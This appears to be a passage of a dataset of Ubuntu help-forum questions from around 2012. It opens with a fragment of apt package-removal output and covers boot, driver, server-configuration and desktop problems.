printer-driver-pxljr printer-driver-sag-gdi printer-driver-splix ptouch-driver pxljr python python-appindicator python-apport python-apt python-apt-common python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-aptdaemon.pkcompat python-brlapi python-cairo python-central python-chardet python-configglue python-configobj python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-decorator python-defer python-dirspec python-egenix-mxdatetime python-egenix-mxtools python-gconf python-gdbm python-gi python-gi-cairo python-glade2 python-gmenu python-gnome2 python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gst0.10 python-gtk-vnc python-gtk2 python-gtksourceview2 python-gtkspell python-httplib2 python-ibus python-imaging python-impacket python-indicate python-keyring python-launchpad-integration python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libvirt python-libxml2 python-louis python-mako python-markupsafe python-minimal python-notify python-oauth python-openssl python-packagekit python-pam python-pcapy python-pexpect python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi2 python-pycurl python-pygoocanvas python-pyinotify python-pyorbit python-qt4 python-qt4-dbus python-rdflib python-renderpm python-reportlab python-reportlab-accel python-serial python-simplegeneric python-simplejson python-sip python-smbc python-software-properties python-speechd python-support python-telepathy python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-ubuntu-sso-client python-ubuntuone-client python-ubuntuone-control-panel python-ubuntuone-storageprotocol python-uno python-urlgrabber python-virtkey python-vte python-wadllib python-webkit python-wnck python-wsgi-intercept python-xapian python-xdg python-xkit python-zeitgeist python-zope.interface python2.7 python2.7-minimal rastertosag-gdi rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone sessioninstaller software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk splix system-config-printer-common system-config-printer-gnome system-config-printer-udev tomboy totem totem-mozilla totem-plugins ttf-mscorefonts-installer ubuntu-artwork ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-sso-client-qt ubuntu-standard ubuntu-system-service ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-control-panel-common ubuntuone-control-panel-gtk ubuntuone-control-panel-qt ubuntuone-couch ubuntuone-installer ufw unattended-upgrades unity unity-2d unity-common unity-lens-applications unity-lens-video unity-place-applications unity-scope-musicstores unity-scope-video-remote update-manager update-manager-core update-notifier update-notifier-common usb-creator-common usb-creator-gtk vim vim-gnome virt-manager virtinst xdiagnose xul-ext-ubufox zeitgeist zeitgeist-core zeitgeist-datahub zeitgeist-extension-ftsa the following new packages will be installed : libatk1.0-0 : i386 libcairo2 : i386 libdatrie1 : i386 libgdk-pixbuf2.0-0 : i386 libgtk2.0-0 : i386 libjasper1 : i386 libpango1.0-0 : i386 libpixman-1-0 : i386 libpython3.2 libthai0 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxft2 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimala warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! python-minimal python2.7-minimal ( due to python-minimal ) 0 upgraded , 18 newly installed , 312 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 10.1 mb of archives . after this operation , 333 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! '
146687	disable icon background colors in application switcher ( alt-tab )	when pressing alt-tab , the application switcher appears . you can continue pressing tab to select the icon of the window you want to show . the `` cursor '' is the icons with a brighter background color , a slight glow around , and the name written below . problem : starting from 12.04 , each icon 's background has a different color . so it is difficult to quickly tell which icon is selected , leading to frequent errors . for instance : selected terminal icon 's background is almost the same color as unselected gedit icon 's background : question : how to disable icon-specific backgrounds in the switcher ? note : icon-specific backgrounds in the launcher can be disabled . this is a different question .
146688	why does n't apache2 respect my envvars file ?	my envvar files has these lines in it : export apache_run_user=www-data export apache_run_group=www-data my apache2.conf has these lines in it : # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } but when i run apache2 -m i get this : apache2 : bad user name $ { apache_run_user } a temporary fix is to hard-code www-data into it my apache2.conf file . there was some speculation here that this was because some configuration script did n't replace the env vars correctly in my apache2.conf file . regardless how do i get apache2 to consult my envvars file ? as another data point this site seems to indicate the envvars is generated at build , but read by apache2ctl at runtime , suggesting that this file is n't just poop leftover by the build process .
146690	how to start a task before networking ?	i 've written an upstart task that modifies /etc/network/interfaces . ( actually a file sourced into it . ) which start on condition do i need to declare to let my task run before any networking jobs ? i 've tried start on starting networking , but that 's apparently too late . when i log in after booting i can see that the changes were written , but obviously they are not used : the new config states a static ip , but the boot process waits for a non-existing dhcp server ( old config ) to time out . i 've also tried start on starting network-interface interface=eth0 , which did n't work either . iirc there was an error in the log that the change could n't be written . background : i need a vm template that can be cloned and the clones configured through a script . among other settings , i need to give them a static ip address to access them from the host . i use guestfish to write a config file to one of the virtual disks and let a script apply these settings to the system . i do n't want that disk to contain an actual system settings file . i ca n't modify /etc directly , because that disk is shared ( copy-on-write/diff ) among the clones and guestfish apparently does n't support that type of image . i could also let them use dhcp and setup a server that assigns ip by mac , but i 'm afraid of the complexity . i could also add just another virtual disk for configuration files , but if possible i 'd prefer to store settings directly on the system disk image . used software : ubuntu server 12.04 , virtualbox . the configuration modifier is a self written ruby script .
146691	is it good or bad to upgrade kernel for ubuntu ?	i use ubuntu 11.10. which has kernel 3.2 . now kernel 3.4.1 is available , is it good or bad to upgrade kernel ? if it 's bad , what are the consequences ?
146699	who is responsible for pidgin-plugin-pack in ubuntu repositories ?	my ubuntu 12.04 still has pidgin-plugin-pack package version 2.6.3-2 , but the latest one is 2.7.0 who is responsible for this package ? how to update from 2.6.3 to 2.7.0 in ubuntu repositories ?
146702	choosing between lucid and squeeze packages ?	when one has the possibility of choosing to install a given package either from a debian squeeze or ubuntu lucid repository on ubuntu 12.04 , which repository should one choose ? for example , wandisco provides svn1.7 packages for both debian squeeze and ubuntu lucid , but i need to install it on ubuntu precise . which package should i go for ?
146714	deleting empty lines in libreoffice calc	in libre office calc i have a bunch of cells that contain empty lines . a single cell looks like this : how can i delete the empty lines from the cells to get cells that look like this : i do not want to edit 200 cells by hand to delete the blank lines . i 'm sure there is a faster way . p.s . i obtained these cells by copying a table from a website into libre office calc . for that i used the clip-board .
146717	use jdk virtually	i have installed ubuntu 12-04 virtually using oracle virtual box . i have installed jdk on windows . is it possible to use the same jdk for ubuntu or i will have to install jdk seperatley for ubuntu ?
146718	why ca n't i download the windows installer ( wubi ) from the ubuntu website ?	when i click on , `` start download '' in the link below , it does n't begin . windows ubuntu installer instead it directs me to the page where i can download ubuntu desktop , here : download what should i do ?
146721	more problems in one	yesterday i installed ubuntu 12.04 on my machine , since i had some previous problems . i had to recover files through photorec . my hard drive got full overnight and didnˈt even finish the recovery process . when i powered it up again , an error came up `` the system is running in low-graphics mode '' i donˈt know if it has anything to do with the recovery process , or the that hard drive got full . i need to delete those recup_dir folders , but also i need to finish recovering and get through the error . so iˈm absolutely desperate . i hope that i wrote this ok . thanks in advance .
146724	how to connect to two wireless network	i have two hotspot/wireless network at my home , and i have 2 wireless adapter in my laptop , can i connect to 2 wireless network and use both to connect to internet for increasing internet access speed ? big thanks.. xgaptek.tk
146726	find everything besides directories	how can i use find command to find every type of the file ( not just -type f but also specials such as sockets , device files etc . ) but ommiting dirs ?
146729	webcam not working in skype	both of my webcams work in cheese on 11.10 & 12.04 ok. skype recognizeses the cameras but will not show any output when i click on test video . yet my friend 's machine which uses a philips pcvc840k webcam works perfectly ? i use a logitech c160 & a philips spc200nc , neither works with skype . can anyone please help ?
146738	recover raid 5 array	i have just broke my software raid 5 array ( build using mdadm ) set up by changing one of the hdd partition . the exact command i used is : sudo parted -s /dev/sdb mklabel msdos on one of 4 hdds in my array . is there a way how to fix this hdd and add it back to array without loosing any data ? i 'm very new to linux , so now sure how to show you more info about my set up . mike
146742	ubuntu installation disk with updates included	i would like to install ubuntu on a computer but i do n't want , right after the installation , to go through the process of installing the updates which came out since the release of the latest ubuntu version . i know there is an option to install the updates during the installation , but i ca n't use that because the computer i want to install ubuntu onto does n't have direct access to internet . i would like the latest updates to be included in the installation disk . where can i find an ubuntu installation disk with updates included ?
146743	how to remove duplicate entries in grub menu ?	after today 's update , ubuntu asked me to replace some files and i blindly accepted . after i restarted pc after the update , i saw duplicate entries in the grub menu : here 's the image of the grub customizer . apparently , grub customizer can not save edited information . is there a way to remove duplicates from ubuntu 12.04 grub menu and set windows 7 on first position ?
146748	limbo fails on startup with internal errors - invalid parameters received	[ update : july 28th 2012 ] after submitting this question , i had some good help from the community a always ! - the bug i submitted was never answered by the developers , which left me feeling disappointed , especially as i gave the bulk of money i paid to the developers . for me personally , i do n't think i would pay for another wine wrapped game - it has to be native or not all or the wine wrapped game wo n't be getting my cash ! [ /update ] i installed limbo from the humble bundle v and as far as i am aware , this has wine packaged with it ( i also installed the latest from the repo 's in case is was because of that ) . however the game does n't even start and fails with the message : wine program error internal errors - invalid parameters received . is there a way to log the error or does anyone know why this happens ? this question was asked previously but it seems to have disappeared . my graphics cards is a geforece gt 250 cheers ice . [ edit : wine outputs the following error : wine /opt/limbo/support/limbo/drive_c/program\ files/limbo/limbo.exe fixme : system : systemparametersinfow unimplemented action : 59 ( spi_setstickykeys ) fixme : system : systemparametersinfow unimplemented action : 53 ( spi_settogglekeys ) fixme : system : systemparametersinfow unimplemented action : 51 ( spi_setfilterkeys ) fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32f580,0x00000000 ) , stub ! err : x11settings : x11drv_changedisplaysettingsex no matching mode found 1920x1080x32 @ 60 ! ( xrandr ) err : xrandr : x11drv_xrandr_setcurrentmode resolution change not successful -- perhaps display has changed ? wine : unhandled page fault on read access to 0x00000000 at address 0x48213e ( thread 0009 ) , starting debugger ... the debugger has the following output : unhandled exception : page fault on read access to 0x00000000 in 32-bit code ( 0x0048213e ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:0048213e esp:0032f9f4 ebp:0037cdd0 eflags:00010202 ( r- -- i - - - ) eax:00000000 ebx:00000000 ecx:00000000 edx:0037cf4c esi:0037cda8 edi:0037cdcc stack dump : 0x0032f9f4 : 0037cda8 0034c708 7bc35120 00000000 0x0032fa04 : 0037cda8 0032fa38 0079fc58 00000000 0x0032fa14 : 0048b7d4 00000001 0037cdcc 00000001 0x0032fa24 : 00000780 00000438 0034c620 00000000 0x0032fa34 : 0034c708 0032fa78 007a04e2 00000002 0x0032fa44 : 0048c4bc 00000780 00000438 0037cda8 backtrace : = > 0 0x0048213e in limbo ( +0x8213e ) ( 0x0037cdd0 ) 0x0048213e : movl 0x0 ( % eax ) , % edx modules : module address debug info name ( 103 modules ) pe 400000- 926000 export limbo pe 10000000-101ff000 deferred d3dx9_43 elf 79bb3000-7b800000 deferred libnvidia-glcore.so.295.53 elf 7b800000-7ba15000 deferred kernel32 < elf > \-pe 7b810000-7ba15000 \ kernel32 elf 7bc00000-7bcc3000 deferred ntdll < elf > \-pe 7bc10000-7bcc3000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7d7e0000-7d7e4000 deferred libnvidia-tls.so.295.53 elf 7d7e4000-7d8bc000 deferred libgl.so.1 elf 7d9d0000-7d9d9000 deferred librt.so.1 elf 7d9d9000-7d9de000 deferred libgpg-error.so.0 elf 7d9de000-7d9f6000 deferred libresolv.so.2 elf 7d9f6000-7d9fa000 deferred libkeyutils.so.1 elf 7d9fa000-7da43000 deferred libdbus-1.so.3 elf 7da43000-7da55000 deferred libp11-kit.so.0 elf 7da55000-7dada000 deferred libgcrypt.so.11 elf 7dada000-7daec000 deferred libtasn1.so.3 elf 7daec000-7daf5000 deferred libkrb5support.so.0 elf 7daf5000-7dafa000 deferred libcom_err.so.2 elf 7dafa000-7db22000 deferred libk5crypto.so.3 elf 7db22000-7dbf1000 deferred libkrb5.so.3 elf 7dbf1000-7dc03000 deferred libavahi-client.so.3 elf 7dc03000-7dc11000 deferred libavahi-common.so.3 elf 7dc11000-7dcd5000 deferred libgnutls.so.26 elf 7dcd5000-7dd13000 deferred libgssapi_krb5.so.2 elf 7dd13000-7dd66000 deferred libcups.so.2 elf 7dd94000-7ddc8000 deferred uxtheme < elf > \-pe 7dda0000-7ddc8000 \ uxtheme elf 7ddc8000-7ddd3000 deferred libxcursor.so.1 elf 7ddd4000-7dde7000 deferred gnome-keyring-pkcs11.so elf 7de47000-7de4d000 deferred libxfixes.so.3 elf 7deac000-7ded6000 deferred libexpat.so.1 elf 7ded6000-7df0a000 deferred libfontconfig.so.1 elf 7df0a000-7df1a000 deferred libxi.so.6 elf 7df1a000-7df1e000 deferred libxcomposite.so.1 elf 7df1e000-7df27000 deferred libxrandr.so.2 elf 7df27000-7df31000 deferred libxrender.so.1 elf 7df31000-7df37000 deferred libxxf86vm.so.1 elf 7df37000-7df3b000 deferred libxinerama.so.1 elf 7df3b000-7df5d000 deferred imm32 < elf > \-pe 7df40000-7df5d000 \ imm32 elf 7df5d000-7df64000 deferred libxdmcp.so.6 elf 7df64000-7df85000 deferred libxcb.so.1 elf 7df85000-7df9f000 deferred libice.so.6 elf 7df9f000-7e0d3000 deferred libx11.so.6 elf 7e0d3000-7e0e5000 deferred libxext.so.6 elf 7e0e5000-7e178000 deferred winex11 < elf > \-pe 7e0f0000-7e178000 \ winex11 elf 7e178000-7e18e000 deferred libz.so.1 elf 7e18e000-7e228000 deferred libfreetype.so.6 elf 7e228000-7e247000 deferred libtinfo.so.5 elf 7e247000-7e269000 deferred libncurses.so.5 elf 7e27d000-7e292000 deferred xinput1_3 < elf > \-pe 7e280000-7e292000 \ xinput1_3 elf 7e292000-7e2a6000 deferred psapi < elf > \-pe 7e2a0000-7e2a6000 \ psapi elf 7e2a6000-7e304000 deferred dbghelp < elf > \-pe 7e2b0000-7e304000 \ dbghelp elf 7e304000-7e391000 deferred msvcrt < elf > \-pe 7e320000-7e391000 \ msvcrt elf 7e391000-7e4c5000 deferred wined3d < elf > \-pe 7e3a0000-7e4c5000 \ wined3d elf 7e4c5000-7e4fe000 deferred d3d9 < elf > \-pe 7e4d0000-7e4fe000 \ d3d9 elf 7e4fe000-7e573000 deferred rpcrt4 < elf > \-pe 7e510000-7e573000 \ rpcrt4 elf 7e573000-7e67b000 deferred ole32 < elf > \-pe 7e590000-7e67b000 \ ole32 elf 7e67b000-7e697000 deferred dinput8 < elf > \-pe 7e680000-7e697000 \ dinput8 elf 7e697000-7e6d1000 deferred winspool < elf > \-pe 7e6a0000-7e6d1000 \ winspool elf 7e6d1000-7e7c9000 deferred comctl32 < elf > \-pe 7e6e0000-7e7c9000 \ comctl32 elf 7e7c9000-7e833000 deferred shlwapi < elf > \-pe 7e7e0000-7e833000 \ shlwapi elf 7e833000-7ea44000 deferred shell32 < elf > \-pe 7e840000-7ea44000 \ shell32 elf 7ea44000-7eb23000 deferred comdlg32 < elf > \-pe 7ea50000-7eb23000 \ comdlg32 elf 7eb23000-7eb3c000 deferred version < elf > \-pe 7eb30000-7eb3c000 \ version elf 7eb3c000-7eb9c000 deferred advapi32 < elf > \-pe 7eb50000-7eb9c000 \ advapi32 elf 7eb9c000-7ec59000 deferred gdi32 < elf > \-pe 7ebb0000-7ec59000 \ gdi32 elf 7ec59000-7ed99000 deferred user32 < elf > \-pe 7ec70000-7ed99000 \ user32 elf 7ef99000-7efa6000 deferred libnss_files.so.2 elf 7efa6000-7efc0000 deferred libnsl.so.1 elf 7efc0000-7efec000 deferred libm.so.6 elf 7efee000-7eff4000 deferred libuuid.so.1 elf 7eff4000-7f000000 deferred libnss_nis.so.2 elf b7411000-b7415000 deferred libxau.so.6 elf b7415000-b741e000 deferred libnss_compat.so.2 elf b741f000-b7424000 deferred libdl.so.2 elf b7424000-b75ca000 deferred libc.so.6 elf b75cb000-b75e6000 deferred libpthread.so.0 elf b75e9000-b75f2000 deferred libsm.so.6 elf b75fa000-b773c000 dwarf libwine.so.1 elf b773e000-b7760000 deferred ld-linux.so.2 elf b7760000-b7761000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 00000008 ( d ) z : \opt\limbo\support\limbo\drive_c\program files\limbo\limbo.exe 00000009 0 < == 0000000e services.exe 00000020 0 0000001f 0 00000019 0 00000018 0 00000017 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001d 0 0000001a 0 00000014 0 00000013 0 0000001b plugplay.exe 00000021 0 0000001e 0 0000001c 0 00000022 explorer.exe 00000023 0 system information : wine build : wine-1.4 platform : i386 host system : linux host version : 3.2.0-24-generic-pae
146749	why is a vym ( view your mind ) file considered an archive ?	i use the program vym ( view your mind ) to draw and manipulate mind maps and outlines . i find it a great application but for some reason the files it creates ( .vym files ) are considered an archive by ubuntu . so two questions , why are .vym files considered an archive and how can i change the file association to allow me to click on a .vym file and have it opened by vym ? this is on the ubuntu 12.04 most current version .
146751	hp elitebook 8440p screen flickers after blank screen ( nvidia )	when my screen turns blank after 10 min or after locking the screen and i begin using the laptop again , the screen is flickering . it looks as if every second line of pixels is blinking and the flickering is mainly present in the upper part of the screen . i am using ubuntu 12.04 with the latest binary nvidia drivers ( current-updates ) . lshw | grep vga tells me : 01:00.0 vga compatible controller : nvidia corporation gt218 [ nvs 3100m ] ( rev a2 ) the problem doesn’t occur after sleeping or on an external display . i used kubuntu 11.10 before , where the problem didn’t occur either . is there anything i can do except waiting for new drivers ?
146754	how to restore unity after gnome-shell installation ?	i just installed gnome-shell in my 12.04 box and , unity disappears from the login screen . this is what i 've done trying to fix : # exec : unity -- reset` purge and install : indicator-session set display full username to true in gsettings `
146755	how can i properly see lyrics in deadbeef ?	the solution should be the infobar plugin - but in my case it does n't look properly . it should look like this ( from the author 's site ) but instead it looks like this , with a large empty space above the tabs : does anybody knows a solution or has the same problem ?
146759	was using ubuntu 12.04 lts , working fine . now have only grub prompt . what do i do now ?	laptop shut down due to errant battery . i was updating all programs on auto update option . now all i have is a grub > prompt . where do i go from here . laptop is an nec versa and ubuntu was working fine up until that moment without any issues .
146775	what can be done to secure ubuntu server ?	i have a project to secure ubuntu server as much as i can . the server is a web hosting server . the server will be running lamp , mail , and dns .
146779	how do i install a puppetmaster ?	i have a fairly large network , and i need to use some sort of configuration management tool to manage it . i 've decided that puppet open source meets my needs . how do i install it ?
146783	i ca n't burn a cd in 12.04 . i can only read data from a cd	i ca n't burn a blank cd/dvd . the system does not recognize any cd/dvd drive . when i insert a cd/dvd with data , there is no problem . the system automounts the drive . please help . thank you .
146795	totem wo n't stream media files	i am unable to stream mp3 's ( and other media formats ) from totem . i 'm not sure when this started happening but i know this used to work via firefox plugin , but since then i 've done an in-place upgrade from 11.10 to 12.04 the issue is driving me to distraction now so i 've done some experimentation and discovered that even from the command line it 's broken totem http : //users.skynet.be/fa046054/home/p22/track06.mp3 this says it 's streaming then status bar updates to `` playing '' but just stalls and does nothing . if , however i download the file first there 's no issue : wget http : //users.skynet.be/fa046054/home/p22/track06.mp3 & & totem track06.mp3 the symptom is the same calling totem from firefox plugin , regular gui and cli . some additional info : os : precise 12.04 ( amd64 ) wm : gnome 3 ad endum i do not want to install vlc . this question relates to how to fix the problem properly ... not hack a temporary workaround . any related information to existing bug reports welcome
146798	ubuntu software center does not proceed from applying changes	i have a problem with ubuntu software center . it is `` searching '' and `` applying changes '' for long period of time . i tired to cancel by clicking cross ( x ) mark . however , it is now stuck at `` cancelling '' . it wo n't let me download any new application even from terminal i guess . neal @ neal-g50vt : ~ $ sudo apt-get install gnome-tweak-tool e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? neal @ neal-g50vt : ~ $ sudo dpkg -- configure -a dpkg : error : dpkg status database is locked by another process there are similar question here , but with no answers : software center stuck for dropbox software center freezes during âapplying changes
146799	`` unable to connect '' to getdeb.net , how do i fix it ?	i want to know what this error means and how to fix it ? the following is the output on the terminal- w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/release.gpg unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/apps/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/apps/i18n/translation-en_in unable to connect to archive.getdeb.net : http : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/precise-getdeb/apps/i18n/translation-en unable to connect to archive.getdeb.net : http : e : some index files failed to download . they have been ignored , or old ones used instead .
146806	how to see the names of files that dropbox is uploading/downloading ?	i would like to know the names of the files that dropbox is currenting upload and downloading . how to best do that ? happy with either a gui or command line answer ...
146810	how do i enlist a server in puppet ?	i 've installed a puppetmaster as described here . now , i need to add a few puppet agents . how can i do that ?
146812	list of bought applications in ubuntu software center or login.ubuntu.com	i am trying to google out where can i find list of applications that i have bought in ubuntu software center or login.ubuntu.com or some other place . is there a way to track them somehow ? thanks for answers !
146813	how i can compute power and traffic for each vm to do accounting for client ?	i 've installed maas cloud but nothing do with accounting ... if i 'm going to use it as a public cloud pxe boot from client . how i can compute power and traffic for each vm to do accounting for client ?
146814	chmod : invalid mode : `+a '	system : ( lsb_release -a ) distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid this is my command : sudo chmod +a `` www-data allow delete , write , append , file_inherit , directory_inherit '' app/cache app/logs docs : http : //symfony.com/doc/current/book/installation.html # configuration-and-setup error : chmod : invalid mode : `+a' try `chmod -- help ' for more information . why does n't this work ? is n't the +a standard chmod ? update : looks like this is a osx only mod : http : //developer.apple.com/library/mac/ # documentation/darwin/reference/manpages/man1/chmod.1.html
146818	ubuntu boots in 2d mode on gt 540m	i have installed ubuntu 12.04 on my laptop . in live mode , ubuntu booted in `` 3d '' mode . but after installing it would always login in 2d mode . i have nvidia graphics card geforce gt 540m . should i install any extra packages ? what could be the problem ?
146822	install ubuntu on a powermac g5 with no cd drive	the powermac g5 is a 1.6ghz model . i do not have access to a cd . can i use usb or a partition to install ubuntu on a powermac g5 ?
146826	how to get rid of the launcher in unity ?	i have this dock installed ( on the right in my screenshot ) and i 'd like it to completely replace the launcher . right clicking on the bar did nothing , nor did [ alt ] + [ super ] + [ right click ] i 'm also pretty much a newb in ubuntu , so please take that into account when answering : ) thx , you guys rule !
146836	3g modem not being detected after instaling v mobile broadband	i have 3g mobile broadband ( visiontek 7.2 hsupa modem with aircel simcard ) which was very well detected and able to browse internet in ubuntu 12.04 previously . unfortunately i have installed v mobile broadband ( bcm software ) out of enthusiasm , after that mobile broadband is not being shown up in network manager . even after complete removal of v mobile broadband also 3g modem is not being detected .
146837	`` dpkg -i mysql-5.5.25-ubuntu10.04-x86_64.deb '' not installing anything ?	i has been logged in as root i want to install mysql 5.5 in ubuntu 10.04 . when browsing tar.gz for source installing , i found deb release mysql-5.5.25-ubuntu10.04-x86_64.deb in this page for ubuntu . so , i simply download it . but i not familiar with dpkg when i run dpkg -i mysql-5.5.25-ubuntu10.04-x86_64.deb , it not install anything . no mysql directory created , and also no init file created running whereis mysql give nothing below is what we can see when i run dpkg : myserver : ~/sourceinstaller # dpkg -i mysql-5.5.25-ubuntu10.04-x86_64.deb selecting previously deselected package mysql . ( reading database ... 25178 files and directories currently installed . ) unpacking mysql ( from mysql-5.5.25-ubuntu10.04-x86_64.deb ) ... setting up mysql ( 5.5.25 ) ... myserver : ~/sourceinstaller # i do n't know what i 've just missed .
146838	how large should i make root , home , usr , var , and tmp partitions ?	i install ubuntu server 10.04 , have 64 gb vhd . and want to separate partitions in this mode : /dev/xvda0 p on swap ( 2 gb ) /dev/xvda1a0 e on /boot ( 128 mb ) /dev/xvda1a1 e on / type ffs ( local ) /dev/xvda1a2 e on /usr type ffs ( local , nodev ) /dev/xvda1a3 e on /tmp type ffs ( local , nodev ) /dev/xvda1a4 e on /var/log type ffs ( local , nodev ) /dev/xvda1a5 e on /var type ffs ( local , nodev , nosuid ) /dev/xvda1a6 e on /home type ffs ( local , nodev , nosuid , with quotas ) /dev/xvda2 p on /new ( local , nodev , nosuid , noexec ) with rest of space ~50gb . but i'ma stuck , and do n't know what size to give to each folder . also i want to encrypt partitions . thank you for any tips . edit : system need minimum size , here will be installed about 10 apps like ufw , apache , mysql , chkrootkit and so on .
146839	copying issue with home directory	i am new to ubuntu and i was wondering why i am unable to copy codeigniter folder in downloads to another folder in the home directory ? i just installed lamp and setup a another folder by following this guide and fear i may have messed something up .
146844	grub-install failure ( fatal error )	i am trying to install ubuntu 12.04 from a usb side by side with windows 7 . my hard drive already had 3 partitions by window : sda1 ( 1.8gb ) for system sda2 ( 700 gb ) for windows sda3 ( 16gb ) for windows recovery . i shrunk windows partition to 200gb and made a new extended partition within which sda5 ( 10gb ) is linux-swap and rest is sda6 for linux ( ext4 ) . the installation runs fine until the end when it says `` grub-install dev/sda6 failed . i tried to give it an option to install grub in dev/sda but it does n't work . please help .
146852	encrypted windows partition with ubuntu / grub configuration	guys i would like to encrypt my windows partition only , as i have dual boot windows 7 ultimate and ubuntu 12.04 . i would like to encrypt all my windows partition with truecrypt as i suppose you already now , but i was wondering how will it work ? i suppose when i am gon na encrypt the whole partition of windows with true crypt , when i will boot linux grub will not find the partition ? ! how can i do for the grub to find my partition windows encrypted ? thanks guys ps : basically more simple , i will encrypt my windows partition only , but grub will not detect anymore my windows partition ?
146855	ubuntu apps open folders instead of documents ?	i must have done something to ubuntu 12.04 on my latop because a few weeks ago , various applications ( chrome , calibre , etc . ) have stopped opening documents ( like pdfs , zip files , etc. ) . what happens when these applications try to open a file is that i get a new nautilus window that is opened to the directory that holds the document . if i then double click the document in the nautilus window , the appropriate app is opened up ( adobe reader , file roller , etc. ) . because of this , i do n't think the issue is with the association between file types and apps , but i could be wrong . i have another desktop system running 12.04 where everything works as expected . what would cause this and how to i fix it ?
146858	how can you check whether a site is hosted by google sites or not ?	i suppose there may be a one-line linux command to check that .
146859	can i compile vlc with every module ?	i 'm looking at instructions to compile vlc , and i have to say which modules i want to include . well , i 'd like to include everything it 's possible to compile with . can i do this ?
146860	count how many files exist on system ?	is there a way to count how many files/folders exist on the system ? even better if i could get the list into a csv file ?
146864	clementine appears in two ppas . how can i specify which one to use ?	the clementine package in 12.04 lacks spotify support . so i added the clementine ppa like this : sudo add-apt-repository ppa : me-davidsansome/clementine sudo apt-get update sudo apt-get install clementine then i installed like this : sudo apt-get install clementine=1.0.1~precise because that 's the version in the clementine-specific ppa . but now the update manager wants to update to the version from the ubuntu archive because it 's newer . how can i tell it to maintain clementine from the clementine ppa , not the ubuntu ppa ? i realize similar questions have been asked but not exactly this , and i ca n't figure it out , so any help would be appreciated . thanks .
146868	everything changed in my desktop after running a command , can anyone help ?	after i executed unity-greeter command in terminal , my theme changed into classic gnome and my icons too . and even some of my icons have been deleted ! i tried to change some files like /etc/lightdm/unity-greeter.conf to change defaults of my session but it was useless . can anyone help me to revert my settings back ?
146869	why does sudo not add root 's path with ubuntu 12.04 ?	i 've recently upgraded my server to ubuntu server 12.04 . previously it was running 11.04 . ever since then i 've been having trouble carrying out root user commands through sudo . an example of this would be : > sudo ufw status sudo : ufw : command not found > sudo su - root > ufw status status : active to action from -- -- -- -- -- -- openssh limit anywhere with ubuntu 11.04 the plain sudo ufw status worked fine , but with ubuntu 12.04 it ca n't find the command . this seems to just be a problem with the path not being set ( ufw is found in /usr/sbin/ufw ) . what i 'm trying to understand is what i need to change back so that root 's path is set correctly when i just sudo < sbin command > ?
146870	ubuntu 12.04 install goes to blanks screen with cursor	memtest works fine , but `` try ubuntu '' , `` install ubuntu '' , and `` check disk for defects '' go to a blank screen with a blinking cursor . i 'm using the 64bit installer because that is what , i think , works with amd processors . hardware : amd sempron , award bios and a gigabyte video card
146880	how big is the download for an upgrade from ubuntu 11.10 to 12.04 ?	i would like to know the download size when updating from ubuntu 11.10 to 12.04 . i have limited bandwidth , and would like to plan when the download happens .
146886	system problem ! ubuntu 12.4	when i was upgrading to ubuntu 12.4 i had to leave and accidentally turned off the laptop in half update . when lit it not entered the system , it put the screen in black and looked just the mouse . i had to install ubuntu 12.4 from a dvd drive apart , when i installed told me that was already installed , it saids that if you wanted to install ubuntu 12.4 with ubuntu 12.4 and i did it , but now i have two ubuntu 12.4 and also can not find my files . what i can do ?
146888	software for imgur image upload	is there any software that can help me upload images directly to imgur.com . command line softwares would be more appreciated .
146889	how to stop cairo dock minimizing conky on show desktop ?	every time i use cairo dock show desktop add-on conky minimizes : i 've read about the own_window_type override option on .conkyrc and it seems to work for some people but it does n't work for me . conky wo n't show up if i use this option ( it is currently set to own_window_type normal ) . any suggestions ? .conkyrc # conky settings # background no update_interval 1 cpu_avg_samples 2 net_avg_samples 2 override_utf8_locale yes double_buffer yes no_buffers yes text_buffer_size 2048 # imlib_cache_size 0 temperature_unit fahrenheit # window specifications # own_window yes own_window_type normal own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 minimum_size 200 250 maximum_width 200 alignment tr gap_x 35 gap_y 55 # graphics settings # draw_shades no draw_outline no draw_borders no draw_graph_borders no # text settings # use_xft yes override_utf8_locale yes xftfont neuropolitical : size=8 xftalpha 0.8 uppercase no temperature_unit celsius default_color ffffff # lua load # lua_load ~/.lua/scripts/clock_rings.lua lua_draw_hook_pre clock_rings text $ { font neuropolitical : size=42 } $ { time % e } $ { goto 100 } $ { font neuropolitical : size=18 } $ { color ff3300 } $ { voffset -75 } $ { time % b } $ { font neuropolitical : size=10 } $ { color ff3300 } $ { voffset 15 } $ { time % a } $ { color ff3300 } $ { hr } $ { goto 